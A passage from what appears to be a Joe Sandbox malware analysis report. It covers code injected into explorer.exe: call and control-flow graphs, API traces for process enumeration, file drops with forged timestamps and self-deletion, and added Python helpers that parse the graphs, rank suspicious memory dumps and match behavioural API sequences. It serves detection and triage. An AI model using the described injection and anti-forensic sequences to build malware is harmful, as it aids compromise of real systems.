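                current = tok
                i += 2
            continue
        if current is not None:               # API names and annotations after the address
            nodes[current]["apis"].append(tok)
        i += 1
    for node in nodes.values():
        node["apis"] = _ANNOTATION.sub("", " ".join(node["apis"])).split()
    return nodes, dict(edges), incomplete


def reachable_apis(nodes, edges, start):
    """Every API name on any node reachable from `start` (including itself), sorted."""
    seen, queue, apis = {start}, deque([start]), set()
    while queue:
        n = queue.popleft()
        apis.update(nodes.get(n, {}).get("apis", []))
        for m in edges.get(n, []):
            if m not in seen:
                seen.add(m)
                queue.append(m)
    return sorted(apis)


def path_to_api(nodes, edges, start, api):
    """Addresses along the shortest path from `start` to the first node calling `api`."""
    parent, queue = {start: None}, deque([start])
    while queue:
        n = queue.popleft()
        if api in nodes.get(n, {}).get("apis", []):
            path = []
            while n is not None:
                path.append(nodes.get(n, {}).get("addr"))
                n = parent[n]
            return path[::-1]
        for m in edges.get(n, []):
            if m not in parent:
                parent[m] = n
                queue.append(m)
    return None


if __name__ == "__main__":
    nodes, edges, incomplete = parse_graph(STAGE2_EXECUTION_GRAPH)
    for entry in ("667", "691", "677"):
        print(nodes[entry]["addr"], reachable_apis(nodes, edges, entry))
    print(" -> ".join(path_to_api(nodes, edges, "667", "NtTerminateProcess")))
```

The same parser reads the control-flow graph strings on this page unchanged, since a basic block's `402c91-402ced` range matches the address pattern; API names are taken as whatever follows the address up to the next node or edge, so a node calling two APIs (`EnumWindows SleepEx` in the second execution graph) yields both.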

                                                                                          Callgraph

                                                                                          Functions (85, each a Function_<address> node):
                                                                                          00401246 00401748 00401BC9 00402ACE 004011D0 00402AD1 00401DD3 00401AD5 004011D7 00402B58
                                                                                          00402DD8 00402E59 004023DB 00402E5C 004027DC 0040195D 0040275E 004010DF 00402DE2 00401064
                                                                                          004016E4 00402B66 00401D66 00402F6A 0040136B 004011EB 00402D6E 00402BEF 004025EF 00402E75
                                                                                          00402D75 00402575 004015F5 00402DF5 00402CF7 00402D79 004017F9 0040187A 00402B7A 0040157F
                                                                                          00402E7F 004013FF 00401381 00402102 00401E82 00402B82 00402E83 00401884 00401705 00402706
                                                                                          00401786 00401686 0040188B 0040180C 0040138C 00401A8C 00402993 00402E14 00401894 00402794
                                                                                          00402E94 00401715 00401297 00401818 00401898 00402E98 0040131A 0040259B 00402A9D 0040281D
                                                                                          0040139D 00402E20 004013A0 00401822 00401826 00401427 0040212C 00401D31 00401D32 00401CB2
                                                                                          00402D33 00401834 00402635 00402DB9 00401D3D
                                                                                          Call edges (caller -> callee):
                                                                                          • 00402ACE -> 0040180C
                                                                                          • 00402AD1 -> 0040180C
                                                                                          • 00402A9D -> 0040180C
                                                                                          • 0040180C -> 00401381
                                                                                          • 00401818 -> 00401381
                                                                                          • 00401822 -> 00401381
                                                                                          • 00401826 -> 00401381
                                                                                          • 00401834 -> 00401381
                                                                                          • 00402D33 -> 004011D0

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • Sleep.KERNELBASE(00001388), ref: 00401846
                                                                                          • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1576271958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProcessSleepTerminate
                                                                                          • String ID:
                                                                                          • API String ID: 417527130-0
                                                                                          • Opcode ID: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                                                                                          • Instruction ID: 439418bc6b8cc85bb90c3f715c5c8777bd26b3ffbf7cafd5698f886abb68661d
                                                                                          • Opcode Fuzzy Hash: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                                                                                          • Instruction Fuzzy Hash: DA014F73608208E7DB057A968C41ABA36299B04754F24C137BA13791F1D63DCB12A76B
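Each "Memory Dump Source" entry names the dump after the region it was taken from. On this page the process-0 dumps carry protection 00000020 (PAGE_EXECUTE_READ) and type 01000000 (MEM_IMAGE), that is, sections of the mapped executable, while the process-2 dump above carries 00000040 (PAGE_EXECUTE_READWRITE) and 00020000 (MEM_PRIVATE) and is still recognised as a PE ("based on PE: true"). Writable, executable memory that is not backed by an image is where injected or unpacked code lives, which is consistent with the injection signatures in this report, so those dumps are the ones to pull first. The helper below is an added example, not Joe Sandbox code. The field layout it decodes is an assumption inferred from the values on this page (the sixth and eighth fields are carried through undecoded), the PAGE_* and MEM_* constants are the Win32 ones from winnt.h, and the sample lines are copied from this report, including the "Download File" link text that the page fused onto the file names.

```python
"""Decode Joe Sandbox memory-dump file names and rank the regions to pull first.

Field layout assumed here (inferred from the names in this report, not taken
from Joe Sandbox documentation):
    <pid>.<dump_no>.<timestamp>.<base>.<protect>.<f6>.<type>.<f8>.sdmp
"""
import re

# Win32 PAGE_* protection constants (winnt.h); the low byte of the protect field.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE = {"PAGE_EXECUTE", "PAGE_EXECUTE_READ",
              "PAGE_EXECUTE_READWRITE", "PAGE_EXECUTE_WRITECOPY"}
# Win32 MEM_* region types as returned by VirtualQuery (winnt.h).
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

_NAME = re.compile(
    r"(\d{8})\.(\d{8})\.(\d+)\.([0-9A-Fa-f]{16})"
    r"\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp"
)

# Lines copied from the 'Memory Dump Source' entries in this report, including the
# 'Download File' link text the page fused onto the names; search() tolerates both.
REPORT_DUMP_LINES = [
    "Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true",
    "Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File",
    "Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File",
    "Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File",
    "Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File",
    "Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File",
    "Source File: 00000002.00000002.1576271958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true",
]


def parse_sdmp_name(text):
    """Pull the dump name out of a report line (or a bare file name) and decode it."""
    m = _NAME.search(text)
    if not m:
        raise ValueError(f"no Joe Sandbox dump name in {text!r}")
    pid, dump_no, ts, base, prot, f6, mtype, f8 = m.groups()
    prot_val = int(prot, 16)
    type_val = int(mtype, 16)
    return {
        "pid": int(pid),
        "dump_no": int(dump_no),
        "timestamp": int(ts),
        "base": int(base, 16),
        "protect": PAGE_PROTECT.get(prot_val & 0xFF, f"0x{prot_val:x}"),
        "guard": bool(prot_val & 0x100),          # PAGE_GUARD modifier bit
        "type": MEM_TYPE.get(type_val, f"0x{type_val:x}"),
        "raw_f6": f6, "raw_f8": f8,               # meaning not established; kept verbatim
        "based_on_pe": "based on PE: true" in text,
    }


def is_injection_candidate(info):
    """Executable memory not backed by an image section is where unpacked stages
    and injected PEs live; RWX private memory that also parses as a PE is the
    strongest signal."""
    return info["protect"] in EXECUTABLE and info["type"] != "MEM_IMAGE"


def triage(lines):
    """Decode every dump line; candidates first, then ordered by pid and base."""
    rows = [parse_sdmp_name(line) for line in lines]
    rows.sort(key=lambda r: (not is_injection_candidate(r), r["pid"], r["base"]))
    return rows


if __name__ == "__main__":
    for r in triage(REPORT_DUMP_LINES):
        flag = "INJECTED?" if is_injection_candidate(r) else ""
        print(f"pid={r['pid']} base={r['base']:#010x} {r['protect']:<24} "
              f"{r['type']:<12} pe={r['based_on_pe']} {flag}")
```

Run against the seven lines on this page the process-2 region sorts to the top as the only executable, non-image dump; the process-0 entries decode to the expected PE section protections (0x20 for the code at 401000, 0x02 for the header page at 400000, 0x04 and 0x08 for the data pages), which is a useful sanity check on the assumed field order.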

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • Sleep.KERNELBASE(00001388), ref: 00401846
                                                                                          • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1576271958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProcessSleepTerminate
                                                                                          • String ID:
                                                                                          • API String ID: 417527130-0
                                                                                          • Opcode ID: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                                                                                          • Instruction ID: 3ccd72cbf6c862e7ac88a574d3d4d63140f03618044998c1cc11cf15f2003e8a
                                                                                          • Opcode Fuzzy Hash: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                                                                                          • Instruction Fuzzy Hash: F5F03133604204E7DB047E96CC41ABA36199B04754F24C537BA13791F1D63DCB12A76B

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • Sleep.KERNELBASE(00001388), ref: 00401846
                                                                                          • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1576271958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProcessSleepTerminate
                                                                                          • String ID:
                                                                                          • API String ID: 417527130-0
                                                                                          • Opcode ID: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                                                                                          • Instruction ID: 86529ff08739d4d45ab2b2fe3aa627bb4dd9aa569924de5dc1b0fc6937d585b1
                                                                                          • Opcode Fuzzy Hash: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                                                                                          • Instruction Fuzzy Hash: FEF03133604204EBDB047E96C841ABA36299B44754F24C537BA13B91F1D63DCB12A76B

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • Sleep.KERNELBASE(00001388), ref: 00401846
                                                                                          • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1576271958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProcessSleepTerminate
                                                                                          • String ID:
                                                                                          • API String ID: 417527130-0
                                                                                          • Opcode ID: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                                                                                          • Instruction ID: 61297dcd7f948f961e89af5f5716b1062d194a974c17104e1ab0fce138cf61ec
                                                                                          • Opcode Fuzzy Hash: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                                                                                          • Instruction Fuzzy Hash: C4F04F33604208A7DB04BE96CC41AAA3719AB04754F248537BB13791E1DA3DCB12A72B

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • Sleep.KERNELBASE(00001388), ref: 00401846
                                                                                          • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1576271958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProcessSleepTerminate
                                                                                          • String ID:
                                                                                          • API String ID: 417527130-0
                                                                                          • Opcode ID: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                                                                                          • Instruction ID: 4e4f5f6328981cf1385f7e82c295c95f43d6d852bc8dfc3b1875bfb827a549ac
                                                                                          • Opcode Fuzzy Hash: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                                                                                          • Instruction Fuzzy Hash: BDF04932604208ABDB04BF92CC81ABA3329AB04754F248537BA12790F1D639C612A72B

                                                                                          Control-flow Graph

                                                                                          Basic blocks (id, address range, APIs called):
                                                                                          • 100 402bef-402c13
                                                                                          • 101 402c19-402c2b
                                                                                          • 102 402cef-402cf4
                                                                                          • 103 402c31-402c42
                                                                                          • 104 402c44-402c4d
                                                                                          • 105 402c52-402c60
                                                                                          • 106 402c62-402c69
                                                                                          • 107 402c72-402c88
                                                                                          • 108 402c6b
                                                                                          • 109 402c6d-402c70
                                                                                          • 110 402c8a-402c8f
                                                                                          • 111 402c91-402ced RtlCreateUserThread
                                                                                          Edges (from -> to):
                                                                                          • 100 -> 101, 102
                                                                                          • 101 -> 102, 103
                                                                                          • 103 -> 104
                                                                                          • 104 -> 105
                                                                                          • 105 -> 105 (self-loop), 106
                                                                                          • 106 -> 107, 108
                                                                                          • 107 -> 110
                                                                                          • 108 -> 104, 109
                                                                                          • 109 -> 110
                                                                                          • 110 -> 102, 111
                                                                                          • 111 -> 102
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1576271958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateThreadUser
                                                                                          • String ID:
                                                                                          • API String ID: 1531140918-0
                                                                                          • Opcode ID: 7297fe9666f666a234085e31a7a962aeb3571d674ea4f6f510c8001b8e52953f
                                                                                          • Instruction ID: 1db3e151d03db0a1b2d88b33ccc958aaf7204f5d63625af9f32895d8f10b8312
                                                                                          • Opcode Fuzzy Hash: 7297fe9666f666a234085e31a7a962aeb3571d674ea4f6f510c8001b8e52953f
                                                                                          • Instruction Fuzzy Hash: D131F631218D098FE798DF1CD889BA273D1F798350F6542AAE809C3395EA74DC5187C6

                                                                                          Execution Graph

                                                                                          Execution Coverage:43%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:3.9%
                                                                                          Total number of Nodes:179
                                                                                          Total number of Limit Nodes:16
execution_graph (rendered from the flattened node/edge dump as the call paths it encodes; addresses and API names are those of the graph nodes)

Code in memory region 083F1000 (explorer.exe):
• 83f18c8 → 83f1919 → 83f1950 → 83f19a0: RtlCreateHeap (83f1aa4), then two CreateThread calls (83f1c2f, 83f1c5d) starting the threads 83f3ca4 and 83f3d80
• thread 83f3d80: EnumWindows and SleepEx in a loop (83f3d92)
• thread 83f3ca4: CreateToolhelp32Snapshot (83f3cc1), SleepEx (83f3d43), retry
• 83f196b: SleepEx loop → 83f197b → 83f2194 → 83f49a0: GetTokenInformation twice (83f49d1, 83f4a00) → 83f5280
• 83f1d34 → 83f4be0: GetVolumeInformationA (83f4c0d)
• 83f1da0: CreateMutexExA → 83f4d50: RegQueryValueExA loop (83f4db3)
• 83f1df9 → 83f1ea4: 83f3534 → 83f368c CoCreateInstance → 83f1ffa CreateFileW → 83f1e25 CreateFileMappingA
• 83f1e61 → 83f223c: 83f3394 CreateFileW → 83f22dc: 83f2647 DeleteFileW, DeleteFileW → 83f26b1 SleepEx, RtlExitUserThread
• 83f1e61 → 83f2cac: 83f3394 CreateFileW

Code in memory region 00B31000 (explorer.exe; same code, more paths executed):
• b318c8 → b31919 → b31950 → b319a0: RtlCreateHeap (b31aa4), then CreateThread, CloseHandle, CreateThread (b31c2f) starting the threads b33d80 and b33ca4
• thread b33d80: EnumWindows and SleepEx in a loop (b33d92)
• thread b33ca4: CreateToolhelp32Snapshot (b33cc1) → Process32First (b33cd5) → call b35000 per entry → Process32Next (b33d28) loop → CloseHandle (b33d3a) → SleepEx (b33d43) → new snapshot
• b3196b: SleepEx loop → b3197b → b32194 → b349a0: GetTokenInformation twice (b349d1, b34a00) → b35280
• b31d34 → b34be0: GetVolumeInformationA (b34c0d)
• b31da0: CreateMutexExA → b34d50: RegQueryValueExA loop (b34db3) → b34e2e ObtainUserAgentString
• b31df9 → b31ea4: b31f2a DeleteFileW, CopyFileW → b31f4a DeleteFileW → b31f95 DeleteFileW → b3487c: SetFileAttributesW, CreateFileW (b348d0), SetFileTime (b3491b) → b31fdd → b33534: GetUserNameW (b33575) → b3368c CoCreateInstance → b31ffa CreateFileW → b31e25 CreateFileMappingA
• b31e61 → b3223c: b33394 CreateFileW → b322dc: heap handling through b33e6c, b34008 and b3281c (RtlReAllocateHeap); b32647 DeleteFileW, DeleteFileW → b33e6c RtlReAllocateHeap → b326b1 SleepEx, RtlExitUserThread
• b31e61 → b32cac: b33394 CreateFileW
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2724026531.0000000000B31000.00000020.80000000.00040000.00000000.sdmp, Offset: 00B31000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b31000_explorer.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateInstance
                                                                                          • String ID:
                                                                                          • API String ID: 542301482-0
                                                                                          • Opcode ID: 2208a6a82576e187932f5e6c94c4aea895329bbb5408a92f633c0b1253718546
                                                                                          • Instruction ID: dd4aaac73c2298b4333ea65d53d994a806922cece24c9dd8dc770428d1d4a123
                                                                                          • Opcode Fuzzy Hash: 2208a6a82576e187932f5e6c94c4aea895329bbb5408a92f633c0b1253718546
                                                                                          • Instruction Fuzzy Hash: 34E1DA34608A4C8FCB94EF68C885E9AB7F1FFA9305F114699E44ACB265DB70E944CB41
                                                                                          APIs
                                                                                          • GetUserNameW.ADVAPI32 ref: 00B33588
                                                                                            • Part of subcall function 00B3368C: CoCreateInstance.COMBASE ref: 00B336D9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2724026531.0000000000B31000.00000020.80000000.00040000.00000000.sdmp, Offset: 00B31000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b31000_explorer.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateInstanceNameUser
                                                                                          • String ID:
                                                                                          • API String ID: 3213660374-0
                                                                                          • Opcode ID: 8c884506d26cdf02d1b48bf5057c53921ff6d3e6c26b0fc65ac87aae79f7f951
                                                                                          • Instruction ID: fd85b0717a7eda2640ef4adfe2bd4f56e0a665237d29c309d34210c189eea59c
                                                                                          • Opcode Fuzzy Hash: 8c884506d26cdf02d1b48bf5057c53921ff6d3e6c26b0fc65ac87aae79f7f951
                                                                                          • Instruction Fuzzy Hash: E511FB30718F4C4FCBE4EB6C940975EB6D2EBDC310F500AAEA84EC7255DA749A458781

                                                                                          Control-flow Graph

control_flow_graph (rendered from the flattened node/edge dump): function at 83f22dc, blocks 83f22dc–83f2815. The prologue 83f22dc–83f233a calls 83f3e6c; after argument checks, 83f2365–83f2398 calls 83f4f18, 83f239e–83f23c3 calls 83f4e6c and 83f502c, and 83f23f8–83f2411 calls 83f502c again. 83f2486–83f24f9 calls 83f52c0 and, on success, 83f24fb–83f2574 calls 83f4e6c, 83f4f18, 83f487c and 83f5224. The dispatch at 83f2584–83f2596 leads either to 83f263f–83f26d0, the block that calls 83f4604, DeleteFileW twice, 83f34ec, 83f3e6c and 83f52a0 and then SleepEx and RtlExitUserThread, or to the paths through 83f259c–83f2639, 83f26d5–83f2778 and 83f277a–83f27d8 that call 83f3e6c, 83f281c, 83f4604 and 83f52a0. All paths converge on 83f27e5–83f27f3 (call 83f52a0) and the epilogue 83f27fb–83f2815.
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2727880328.00000000083F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 083F1000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_83f1000_explorer.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DeleteFile$ExitSleepThreadUser
                                                                                          • String ID: |:|
                                                                                          • API String ID: 2796381497-3736120136
                                                                                          • Opcode ID: d91d37ed029c941088cdd60b12086b6f5c1a390fb29ca23f929d4654a35839fd
                                                                                          • Instruction ID: 0632c1b2ff04e66e8ab730f3ea0da643057f72d06f51438515cd41bcc75521b3
                                                                                          • Opcode Fuzzy Hash: d91d37ed029c941088cdd60b12086b6f5c1a390fb29ca23f929d4654a35839fd
                                                                                          • Instruction Fuzzy Hash: 15E19F30318F498BDB58AB68C4587AB76D1FB98316F50452EE59FC3392DF6898428782

                                                                                          Control-flow Graph

control_flow_graph (rendered from the flattened node/edge dump): function at b322dc, blocks b322dc–b32815, the same routine as 83f22dc in the other region. The prologue b322dc–b3233a calls b33e6c; after argument checks, b32365–b32398 calls b34f18, b3239e–b323c3 calls b34e6c and b3502c, and b323f8–b32411 calls b3502c again. b32486–b324f9 calls b352c0 and, on success, b324fb–b32574 calls b34e6c, b34f18, b3487c and b35224. The dispatch at b32584–b32596 leads either to b3263f–b326d0, the block that calls b34604, DeleteFileW twice, b334ec, b33e6c and b352a0 and then SleepEx and RtlExitUserThread, or to the paths through b3259c–b32639, b326d5–b32778 and b3277a–b327d8 that call b33e6c, b3281c, b34604 and b352a0. All paths converge on b327e5–b327f3 (call b352a0) and the epilogue b327fb–b32815.
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2724026531.0000000000B31000.00000020.80000000.00040000.00000000.sdmp, Offset: 00B31000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b31000_explorer.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DeleteFile$ExitSleepThreadUser
                                                                                          • String ID: |:|
                                                                                          • API String ID: 2796381497-3736120136
                                                                                          • Opcode ID: d91d37ed029c941088cdd60b12086b6f5c1a390fb29ca23f929d4654a35839fd
                                                                                          • Instruction ID: d730ecc3f405b446897bf6b1099330f6bbd73a164dc715a8bd479f8350c4e145
                                                                                          • Opcode Fuzzy Hash: d91d37ed029c941088cdd60b12086b6f5c1a390fb29ca23f929d4654a35839fd
                                                                                          • Instruction Fuzzy Hash: E7E1B030718F488FDB58AB28C4597AA76D1FB98305F60456DE48FC3281DF78ED818782

                                                                                          Control-flow Graph

control_flow_graph (rendered from the flattened node/edge dump): function at b319a0, blocks b319a0–b31ca8. A setup loop over b319d7–b31a4f is followed by two calls to b31cb0 (b31a5e, b31a7c); b31aa4–b31ad3 calls RtlCreateHeap; b31ad5–b31aef (call b34e6c) and b31af5–b31b0d (call b35224) form a loop; b31b0f–b31bbe makes five more b31cb0 calls; b31bc4–b31c1f calls b34a6c three times; after the checks at b31c21 and b31c2a, b31c2f–b31c7c calls CreateThread, CloseHandle, CreateThread and returns through b31c84–b31c86. Every failed check exits through b31c88 → b31c8a–b31ca8.
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2724026531.0000000000B31000.00000020.80000000.00040000.00000000.sdmp, Offset: 00B31000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b31000_explorer.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Create$Thread$CloseHandleHeap
                                                                                          • String ID: iP+
                                                                                          • API String ID: 371905858-51890417
                                                                                          • Opcode ID: 26f900cbed04e092ee0982a3be71c41bf08b15ef31f8e9e270c5fbcd78812b0b
                                                                                          • Instruction ID: e697d657c96d01d4d7624a9cee751c30ba8788485cf5e086117cb089126b5dde
                                                                                          • Opcode Fuzzy Hash: 26f900cbed04e092ee0982a3be71c41bf08b15ef31f8e9e270c5fbcd78812b0b
                                                                                          • Instruction Fuzzy Hash: EE91A530218A089FCF48EF1CD8C26E573E5FB98300F645AB99C4ECF256DA34E9558B91

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B31E25), ref: 00B31F2D
                                                                                          • CopyFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B31E25), ref: 00B31F3C
                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B31E25), ref: 00B31F4D
                                                                                          • DeleteFileW.KERNEL32 ref: 00B31F98
                                                                                            • Part of subcall function 00B3487C: SetFileAttributesW.KERNEL32 ref: 00B348D8
                                                                                            • Part of subcall function 00B3487C: CreateFileW.KERNEL32 ref: 00B34902
                                                                                            • Part of subcall function 00B3487C: SetFileTime.KERNEL32 ref: 00B3492D
                                                                                          • CreateFileW.KERNEL32 ref: 00B32021
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2724026531.0000000000B31000.00000020.80000000.00040000.00000000.sdmp, Offset: 00B31000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b31000_explorer.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$Delete$Create$AttributesCopyTime
                                                                                          • String ID:
                                                                                          • API String ID: 642576546-0
                                                                                          • Opcode ID: 8d1e4db704517eea09dd1d3d297329f0e9ff07853cce15996669b6bd33a65373
                                                                                          • Instruction ID: c6fbcc8ebf8f2ca254ddd1bd90bec7b78be2c6e8157e00e34422180b35e1f627
                                                                                          • Opcode Fuzzy Hash: 8d1e4db704517eea09dd1d3d297329f0e9ff07853cce15996669b6bd33a65373
                                                                                          • Instruction Fuzzy Hash: 1B416030718E5C4FCBA8EF6C94597AE72D2EB98300F6045ADA84EC7386DE34DD458781

                                                                                          Control-flow Graph

control_flow_graph (rendered from the flattened node/edge dump): function at b33ca4, blocks b33ca4–b33d74. b33cc1–b33cd3 calls CreateToolhelp32Snapshot; b33cd5–b33ceb calls Process32First; for each entry b33ced–b33d04 calls b35000, a compare loop runs over b33d0a–b33d18 and, on a match, b33d1c–b33d23 calls b34678; b33d28–b33d30 calls Process32Next and loops back to b33d36. When the enumeration ends, b33d3a–b33d3d calls CloseHandle and b33d43–b33d55 calls SleepEx, after which control returns to the snapshot call or leaves through b33d5b–b33d74.
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2724026531.0000000000B31000.00000020.80000000.00040000.00000000.sdmp, Offset: 00B31000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b31000_explorer.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32
                                                                                          • String ID:
                                                                                          • API String ID: 2482764027-0
                                                                                          • Opcode ID: 1adf98eb8c503d42aecd34c6b39fce325a4a04e32c54699d588d18b6d36bf1ef
                                                                                          • Instruction ID: 001c91bd714fa90babff6bf653327208beea4b38ca171f727517e6061c3468b0
                                                                                          • Opcode Fuzzy Hash: 1adf98eb8c503d42aecd34c6b39fce325a4a04e32c54699d588d18b6d36bf1ef
                                                                                          • Instruction Fuzzy Hash: 5B110330208A498FEB18EF24C4887BB76D2FB88315F684AB9D44BDA696DB7489418751
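The execution graphs and control-flow graphs above give the call order the injected code follows inside explorer.exe: a process-enumeration loop (CreateToolhelp32Snapshot, Process32First, Process32Next, CloseHandle, SleepEx, new snapshot; function b33ca4), a drop of the payload with forged timestamps (CopyFileW followed by SetFileAttributesW, CreateFileW and SetFileTime on the copy; b31ea4 and b3487c) and a self-delete thread (DeleteFileW twice, SleepEx, RtlExitUserThread; block b3263f of b322dc). The following Python is an added example, not part of the Joe Sandbox report and not code from the sample, showing how those three sequences can be matched as ordered subsequences over an API-call trace. The ApiCall record, the trace format, the file paths and both sample traces are constructed for this example; only the API names and their order come from the graphs.

```python
"""Match behavioural API sequences in an API-call trace (added example).

The three patterns mirror the call order the Joe Sandbox execution graphs
show for the code injected into explorer.exe. Everything else (the ApiCall
record, the trace format, the paths and both sample traces) is constructed
for this example and is not part of the report.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Sequence


@dataclass(frozen=True)
class ApiCall:
    seq: int        # position in the trace
    api: str        # API name as the monitor logged it, e.g. "SetFileTime"
    path: str = ""  # file path argument; "" for APIs that take none


# Ordered API names; a pattern matches when they appear in this order with
# any number of unrelated calls in between (subsequence match).
PATTERNS: Dict[str, List[str]] = {
    # b31ea4 -> b3487c: copy of the payload, then attributes, handle and
    # forged timestamps on that copy
    "drop_and_timestomp": ["CopyFileW", "SetFileAttributesW",
                           "CreateFileW", "SetFileTime"],
    # b322dc block b3263f: the original file is deleted, the thread exits
    "self_delete": ["DeleteFileW", "DeleteFileW", "SleepEx",
                    "RtlExitUserThread"],
    # b33ca4: enumerate processes, sleep, take a fresh snapshot
    "process_enum_loop": ["CreateToolhelp32Snapshot", "Process32First",
                          "Process32Next", "CloseHandle", "SleepEx",
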